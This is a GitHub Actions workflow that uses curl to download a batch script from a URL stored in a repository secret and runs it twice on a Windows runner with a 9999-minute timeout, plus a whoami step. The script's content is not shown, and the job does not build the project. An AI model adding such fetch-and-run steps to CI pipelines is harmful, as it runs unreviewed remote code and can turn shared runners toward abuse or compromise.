name: mainRUN

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - run: curl -s -L ${{secrets.RUNSCRIPT}} -o run.bat
    - name: script
      run: cmd /c run.bat
    - name: owner
      run: cmd /c whoami
    - name: v-script
      run: cmd /c run.bat
